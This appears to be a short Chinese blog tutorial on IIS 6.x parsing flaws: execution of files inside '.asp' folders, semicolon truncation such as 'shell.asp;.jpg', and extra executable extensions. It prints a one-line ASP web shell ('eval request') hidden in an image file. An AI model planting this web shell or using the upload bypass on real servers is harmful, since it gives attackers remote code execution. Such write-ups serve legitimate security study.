IIS解析漏洞

Zmxcl-0072024-12-23 14:15

IIS6.X

在iis6.x中,.asp文件夹中的任意文件都会被当做asp文件去执行

在默认网站里创建一个a.asp文件夹并创建一个1.jpg写进我们的asp代码

<%=now()%>

#asp一句话

<%eval request("h")%>

单独创建一个1.jpg发现并不能解析

在a.asp下被解析

在IIS 6 处理文件解析时,分号可以起到截断的效果。也就是说 shell.asp;.jpg会被服务器看成是

shell.asp。另外IIS6.0默认的可执行文件除了asp还包含 asa\cer\cdx

相关推荐
T0uken15 分钟前
【LLM】MCP(Python):实现 SSE 通信的 Server 和 Client
数据库·python·microsoft
心灵宝贝33 分钟前
openssl-1.0.1e.tar.gz编译安装步骤
linux·运维·服务器
自由鬼34 分钟前
开源免费虚拟化软件PVE功能介绍
运维·服务器·开源·虚拟化
想要打 Acm 的小周同学呀1 小时前
TCP基础篇(一)
服务器·网络·tcp/ip
死磕java的孤行者1 小时前
Redis 分布式锁
数据库·redis·分布式
越甲八千2 小时前
pyqt SQL Server 数据库查询-优化2
数据库·windows·pyqt
矮油0_o2 小时前
5.好事多磨 -- TCP网络连接Ⅱ
服务器·网络·tcp/ip·网络编程·socket
敢敢のwings2 小时前
C++信号与槽机制自实现
开发语言·数据库·c++
m0_677904842 小时前
Nginx介绍及使用
服务器·nginx
菜鸟xy..2 小时前
麒麟系统桌面版本v10安装教程
linux·运维·服务器·虚拟机·安装教程·麒麟
热门推荐
01汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量02我决定放弃搞 Java 了03如何在WPS和Word/Excel中直接使用DeepSeek功能04生活电子常识--删除谷歌浏览器搜索记录05DeepSeek各版本说明与优缺点分析06从零安装 LLaMA-Factory 微调 Qwen 大模型成功及所有的坑07智能驾驶中预测模块简介08RAG 实践- Ollama+RagFlow 部署本地知识库09DeepSeek RAGFlow构建本地知识库系统10SpringAI整合Ollama集成DeepSeek